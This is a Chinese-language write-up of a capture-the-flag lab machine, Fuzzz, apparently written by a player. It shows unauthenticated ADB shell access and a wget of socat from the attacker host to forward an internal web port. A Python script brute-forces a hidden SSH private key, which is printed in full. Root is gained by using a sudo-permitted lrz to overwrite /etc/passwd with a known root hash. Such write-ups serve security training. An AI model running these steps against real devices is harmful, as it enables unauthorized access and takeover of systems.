Fuzzz

靶机信息

靶机名: Fuzzz

难度: Low-Easy

信息收集

root@kali:~# arp-scan --localnet -I eth0
Interface: eth0, type: EN10MB, MAC: 00:0c:29:d8:ab:ac, IPv4: 192.168.100.100
Starting arp-scan 1.10.0 with 256 hosts (https://github.com/royhills/arp-scan)
192.168.100.1    bc:24:11:b4:12:2d    (Unknown)
192.168.100.2    bc:24:11:a2:5b:a7    (Unknown)
192.168.100.3    00:e0:4f:25:79:40    Cisco Systems, Inc
192.168.100.10    90:09:d0:24:84:21    Synology Incorporated
192.168.100.11    c8:98:28:3e:45:5b    (Unknown)
192.168.100.12    c8:98:28:3e:49:9d    (Unknown)
192.168.100.50    08:00:27:90:b8:90    PCS Systemtechnik GmbH
192.168.100.53    98:8f:e0:6b:01:94    Huaqin Technology Co.,Ltd.
192.168.100.53    98:8f:e0:6b:01:94    Huaqin Technology Co.,Ltd. (DUP: 2)
192.168.100.51    54:48:e6:cb:25:c9    Beijing Xiaomi Mobile Software Co., Ltd
root@kali:~# nmap 192.168.100.50 -p- -sC -sV
Starting Nmap 7.95 ( https://nmap.org ) at 2025-05-19 03:29 EDT
Nmap scan report for 192.168.100.50
Host is up (0.0012s latency).
Not shown: 65533 closed tcp ports (reset)
PORT     STATE SERVICE VERSION
22/tcp   open  ssh     OpenSSH 9.9 (protocol 2.0)
| ssh-hostkey:
|   256 b6:7b:e7:e5:b3:33:c7:ff:db:63:5d:b3:75:0d:e2:dd (ECDSA)
|_  256 0a:ce:e5:c3:de:50:9c:6d:b7:0d:de:73:b8:6c:28:55 (ED25519)
5555/tcp open  adb     Android Debug Bridge (token auth required)
MAC Address: 08:00:27:90:B8:90 (PCS Systemtechnik/Oracle VirtualBox virtual NIC)
Service Info: OS: Android; CPE: cpe:/o:linux:linux_kernel

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 11.62 seconds

Web

5555 是 adb (Android Debug Bridge)。nmap 虽然标注了 token auth required, 但下面的 adb connect 没有经过任何认证就直接连上了, 这就是初始立足点。

> adb connect 192.168.100.50:5555
connected to 192.168.100.50:5555
> adb devices
List of devices attached
192.168.100.50:5555    device
``
> adb shell
/ $ id
uid=1000(runner) gid=1000(runner) groups=1000(runner)
/opt $ netstat -tuln
Active Internet connections (only servers)
Proto Recv-Q Send-Q Local Address           Foreign Address         State
tcp        0      0 127.0.0.1:80            0.0.0.0:*               LISTEN
tcp        0      0 0.0.0.0:5555            0.0.0.0:*               LISTEN
tcp        0      0 0.0.0.0:22              0.0.0.0:*               LISTEN
tcp        0      0 :::22                   :::*                    LISTEN

进入 shell 后, netstat 显示 80 端口只监听在 127.0.0.1 上, 外部无法直接访问, 所以上传一个 socat 把它转发到 4444 端口。

/tmp $ wget 192.168.100.100:8000/socat
Connecting to 192.168.100.100:8000 (192.168.100.100:8000)
saving to 'socat'
socat                100% |********************************|  366k  0:00:00 ETA
'socat' saved
/tmp $ chmod +x socat
/tmp $ ./socat TCP-LISTEN:4444,fork TCP4:127.0.0.1:80 &

image-20250519153807900
image-20250519153807900

访问后发现网页中有很多内容

root@kali:~# gobuster dir -x php,html,js,txt -w /usr/share/wordlists/seclists/Discovery/Web-Content/directory-list-2.3-medium.txt -t 50 -u http://192.168.100.50:4444
===============================================================
Gobuster v3.6
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url:                     http://192.168.100.50:4444
[+] Method:                  GET
[+] Threads:                 50
[+] Wordlist:                /usr/share/wordlists/seclists/Discovery/Web-Content/directory-list-2.3-medium.txt
[+] Negative Status codes:   404
[+] User Agent:              gobuster/3.6
[+] Extensions:              php,html,js,txt
[+] Timeout:                 10s
===============================================================
Starting gobuster in directory enumeration mode
===============================================================
/line                 (Status: 200) [Size: 0]
/line2                (Status: 200) [Size: 0]
/line1                (Status: 200) [Size: 0]

root@kali:~# curl 192.168.100.50:4444/line
root@kali:~#

访问后, 还是有很多内容

root@kali:~# gobuster dir -x php,html,js,txt -w /usr/share/wordlists/seclists/Discovery/Web-Content/directory-list-2.3-medium.txt -t 50 -u http://192.168.100.50:4444/line
===============================================================
Gobuster v3.6
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url:                     http://192.168.100.50:4444/line
[+] Method:                  GET
[+] Threads:                 50
[+] Wordlist:                /usr/share/wordlists/seclists/Discovery/Web-Content/directory-list-2.3-medium.txt
[+] Negative Status codes:   404
[+] User Agent:              gobuster/3.6
[+] Extensions:              php,html,js,txt
[+] Timeout:                 10s
===============================================================
Starting gobuster in directory enumeration mode
===============================================================
/b                    (Status: 200) [Size: 0]
/b3                   (Status: 200) [Size: 0]

仍然有很多内容,看到后我都傻逼了,靶机名字叫 fuzz,然后我就去 fuzz 了

root@kali:~# wfuzz -c -w /usr/share/wordlists/seclists/Discovery/Web-Content/common.txt -u http://192.168.100.50:4444/line/b3FUZZ --hc 404
 /usr/lib/python3/dist-packages/wfuzz/__init__.py:34: UserWarning:Pycurl is not compiled against Openssl. Wfuzz might not work correctly when fuzzing SSL sites. Check Wfuzz's documentation for more information.
********************************************************
* Wfuzz 3.1.0 - The Web Fuzzer                         *
********************************************************

Target: http://192.168.100.50:4444/line/b3FUZZ
Total requests: 4744

=====================================================================
ID           Response   Lines    Word       Chars       Payload
=====================================================================

000000210:   200        0 L      0 W        0 Ch        "B"

Total time: 0
Processed Requests: 4744
Filtered Requests: 4743
Requests/sec.: 0

拼起来是 b3B

我猜测这可能是私钥的前三个字母 (b3B 正好是 OpenSSH 私钥 base64 正文开头 "openssh-key-v1" 编码后的前三个字符), 那么就可以编写脚本逐字符爆破了

import requests
from urllib.parse import quote
import os

# Target and scan configuration shared by the helpers below.
base_url = "http://192.168.100.50:4444"
initial_path = "/line1/"
max_line_number = 10  # highest /line<N>/ prefix that will be enumerated
output_dir = "scan_results"  # receives one line_<N>.txt per enumerated prefix

session = requests.Session()
# NOTE(review): requests.Session has no timeout attribute; this value only takes
# effect if it is passed explicitly as timeout= on each request.
session.timeout = 3

# Create the results directory up front (no error if it already exists).
os.makedirs(output_dir, exist_ok=True)

# Alphabet tried at every position: A-Z, a-z, 0-9, '+', '/' and the '=' padding.
base64_chars = "".join((
    "ABCDEFGHIJKLMNOPQRSTUVWXYZ",
    "abcdefghijklmnopqrstuvwxyz",
    "0123456789",
    "+/=",
))

def save_result(line_num, path):
    """Append the full URL of a confirmed path to <output_dir>/line_<line_num>.txt.

    Args:
        line_num: index of the /line<N>/ prefix the hit belongs to; selects the file.
        path: URL path (already URL-encoded) that answered 200.
    """
    target = os.path.join(output_dir, f"line_{line_num}.txt")
    with open(target, "a") as out:
        # print() adds the trailing newline, one URL per line.
        print(f"{base_url}{path}", file=out)



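def brute_force_url(prefix_path, current_line):
    """Try every base64 character as the next path component; return those answering 200.

    Args:
        prefix_path: URL path to extend, e.g. "/line1/b3B".
        current_line: index of the /line<N>/ prefix, passed through to save_result().

    Returns:
        List of raw (unencoded) characters for which
        GET base_url + prefix_path + char returned status 200.
    """
    found_chars = []
    # requests.Session does not honour a .timeout attribute, so the value set on
    # the session must be passed per request; otherwise a stalled server hangs the scan.
    timeout = getattr(session, "timeout", None)
    for char in base64_chars:
        # '/' is a path separator, so it is sent as %2F; every other character of
        # the alphabet is safe in a URL path as-is.
        encoded_char = quote(char, safe='') if char == '/' else char
        url = f"{base_url}{prefix_path}{encoded_char}"
        try:
            response = session.get(url, timeout=timeout)
        except requests.exceptions.RequestException as e:
            print(f"[-] Error on {url}: {e}")
            continue
        if response.status_code == 200:
            print(f"[+] Found valid char: '{char}' (encoded: '{encoded_char}') | URL: {url}")
            found_chars.append(char)
            save_result(current_line, f"{prefix_path}{encoded_char}")
    return found_chars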

def recursive_brute_force(prefix_path, current_line):
    """Depth-first extension of prefix_path, one confirmed character at a time.

    Stops (and reports) as soon as no character yields a 200, which is how the
    end of a line is detected; every confirmed prefix is recorded by
    brute_force_url() on the way down.
    """
    next_chars = brute_force_url(prefix_path, current_line)
    if len(next_chars) == 0:
        print(f"[!] No valid chars found for {prefix_path}")
        return
    # NOTE(review): a confirmed '/' is appended raw here but was requested as %2F
    # by brute_force_url — confirm the server treats both forms alike.
    for extended in (f"{prefix_path}{c}" for c in next_chars):
        print(f"[*] Recursing into: {extended}")
        recursive_brute_force(extended, current_line)

# Pass 1: enumerate the first key line under initial_path ("/line1/").
print(f"[*] Starting brute force on {base_url}{initial_path}")
recursive_brute_force(initial_path, 1)

# Pass 2: the remaining lines live under /line2/ ... /line<max_line_number>/.
for line_num in range(2, max_line_number + 1):
    initial_path = "/line{}/".format(line_num)
    print(f"[*] Switching to path: {initial_path}")
    recursive_brute_force(initial_path, line_num)

print(f"[*] All scans completed. Results saved to {output_dir}/")

ai写的人机代码, 保存后需要自己处理一下

root@kali:~/scan_results# ls -al
总计 40
drwxr-xr-x  2 root root 4096  5月19日 03:46 .
drwx------ 13 root root 4096  5月19日 03:45 ..
-rw-r--r--  1 root root 4865  5月19日 03:46 line_1.txt
-rw-r--r--  1 root root 4658  5月19日 03:46 line_2.txt
-rw-r--r--  1 root root 4865  5月19日 03:46 line_3.txt
-rw-r--r--  1 root root 2331  5月19日 03:46 line_4.txt
-rw-r--r--  1 root root 2486  5月19日 03:47 line_5.txt
root@kali:~/scan_results# for file in line_*.txt; do tail -n 1 "$file"; done > all.txt
root@kali:~/scan_results# cat all.txt
http://192.168.100.50:4444/line1/b3BlbnNzaC1rZXktdjEAAAAABG5vbmUAAAAEbm9uZQAAAAAAAAABAAAAMwAAAAtzc2gtZW
http://192.168.100.50:4444/line2/QyNTUxOQAAACArnEFFrjDI6rYt5GmUDxMvSeX3pcn0GGBfgo1EQtXpgwAAAJDS3+5f0t/u
http://192.168.100.50:4444/line3/XwAAAAtzc2gtZWQyNTUxOQAAACArnEFFrjDI6rYt5GmUDxMvSeX3pcn0GGBfgo1EQtXpgw
http://192.168.100.50:4444/line4/AAAEBCjeRitoZJIm1c4i0VD2Muw5nqgb7zC13vMaxS/la+vSucQUWuMMjqti3kaZQPEy9J
http://192.168.100.50:4444/line5/5felyfQYYF+CjURC1emDAAAACWFzYWhpQHBoaQECAwQ=
root@kali:~/scan_results# sed 's|http://192.168.100.50:4444/line[0-9]*/||' all.txt > id
root@kali:~/scan_results# cat id
b3BlbnNzaC1rZXktdjEAAAAABG5vbmUAAAAEbm9uZQAAAAAAAAABAAAAMwAAAAtzc2gtZW
QyNTUxOQAAACArnEFFrjDI6rYt5GmUDxMvSeX3pcn0GGBfgo1EQtXpgwAAAJDS3+5f0t/u
XwAAAAtzc2gtZWQyNTUxOQAAACArnEFFrjDI6rYt5GmUDxMvSeX3pcn0GGBfgo1EQtXpgw
AAAEBCjeRitoZJIm1c4i0VD2Muw5nqgb7zC13vMaxS/la+vSucQUWuMMjqti3kaZQPEy9J
5felyfQYYF+CjURC1emDAAAACWFzYWhpQHBoaQECAwQ=
root@kali:~/scan_results#
-----BEGIN OPENSSH PRIVATE KEY-----
b3BlbnNzaC1rZXktdjEAAAAABG5vbmUAAAAEbm9uZQAAAAAAAAABAAAAMwAAAAtzc2gtZW
QyNTUxOQAAACArnEFFrjDI6rYt5GmUDxMvSeX3pcn0GGBfgo1EQtXpgwAAAJDS3+5f0t/u
XwAAAAtzc2gtZWQyNTUxOQAAACArnEFFrjDI6rYt5GmUDxMvSeX3pcn0GGBfgo1EQtXpgw
AAAEBCjeRitoZJIm1c4i0VD2Muw5nqgb7zC13vMaxS/la+vSucQUWuMMjqti3kaZQPEy9J
5felyfQYYF+CjURC1emDAAAACWFzYWhpQHBoaQECAwQ=
-----END OPENSSH PRIVATE KEY-----
UserFlag
fuzzz:~$ cat user.flag
flag{da39a3ee5e6b4b0d3255bfef95601890afd80709}

提权 Root

fuzzz:~$ sudo -l
Matching Defaults entries for asahi on fuzzz:
    secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin

Runas and Command-specific defaults for asahi:
    Defaults!/usr/sbin/visudo env_keep+="SUDO_EDITOR EDITOR VISUAL"

User asahi may run the following commands on fuzzz:
    (ALL) NOPASSWD: /usr/local/bin/lrz

lrz 是 lrzsz 套件里的 ZMODEM 接收工具, 它会把收到的文件写到当前目录; 由于 sudo 以 root 身份运行它, 这等于一个以 root 权限的任意文件写入, 所以先 cd 到 /etc 再执行。任何能以 root 写文件的程序都不应出现在 NOPASSWD 的 sudo 规则里。

fuzzz:~$ cd /etc/                                                                                              
fuzzz:/etc$ sudo /usr/local/bin/lrz -y

在本机写一个 passwd 文件 (root 那一行的第二个字段不再是 x, 而是直接填入本地生成的密码哈希), 通过 lrz 上传到 /etc/ 覆盖原来的 passwd

image-20250519155453458
image-20250519155453458

fuzzz:/etc$ cat passwd
root:$1$OW793DB3$k/E4oi0ePHb8PXxhCEBIt1:0:0:root:/root:/bin/sh
bin:x:1:1:bin:/bin:/sbin/nologin
daemon:x:2:2:daemon:/sbin:/sbin/nologin
lp:x:4:7:lp:/var/spool/lpd:/sbin/nologin
sync:x:5:0:sync:/sbin:/bin/sync
shutdown:x:6:0:shutdown:/sbin:/sbin/shutdown
halt:x:7:0:halt:/sbin:/sbin/halt
mail:x:8:12:mail:/var/mail:/sbin/nologin
news:x:9:13:news:/usr/lib/news:/sbin/nologin
uucp:x:10:14:uucp:/var/spool/uucppublic:/sbin/nologin
cron:x:16:16:cron:/var/spool/cron:/sbin/nologin
ftp:x:21:21::/var/lib/ftp:/sbin/nologin
sshd:x:22:22:sshd:/dev/null:/sbin/nologin
games:x:35:35:games:/usr/games:/sbin/nologin
ntp:x:123:123:NTP:/var/empty:/sbin/nologin
guest:x:405:100:guest:/dev/null:/sbin/nologin
nobody:x:65534:65534:nobody:/:/sbin/nologin
klogd:x:100:101:klogd:/dev/null:/sbin/nologin
runner:x:1000:1000::/home/runner:/bin/sh
asahi:x:1001:1001::/home/asahi:/bin/sh
uwsgi:x:101:102:uwsgi:/dev/null:/sbin/nologin

上面写入的哈希所对应的明文就是 root 的新密码, 直接 su 切换即可

fuzzz:/etc$ su
Password: 123
/etc # id
uid=0(root) gid=0(root) groups=0(root),0(root),1(bin),2(daemon),3(sys),4(adm),6(disk),10(wheel),11(floppy),20(dialout),26(tape),27(video)
RootFlag
~ # cat root.flag 
flag{46a0e055d5db8d82eee6e7eb3ee3ccf64be3fca2}